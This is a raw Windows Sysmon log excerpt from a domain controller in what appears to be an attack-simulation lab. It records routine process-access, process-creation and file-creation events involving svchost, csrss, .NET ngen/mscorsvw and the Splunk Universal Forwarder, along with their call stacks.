\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.986{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:51.955{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e68-0\Accessibility.dll2021-01-18 13:44:51.955 10341000x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:51.892{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.892{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:51.861{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D3-6005-4C01-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.861{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D3-6005-4C01-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:51.861{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D3-6005-4C01-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:51.783{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\db0-0\System.Management.dll2021-01-18 13:44:51.783 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:52.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.189{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:52.189{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D4-6005-4E01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.001{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D4-6005-4E01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.001{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D4-6005-4E01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.783{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:53.783{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.751{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D5-6005-5101-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.736{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D5-6005-5101-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.736{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D5-6005-5101-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
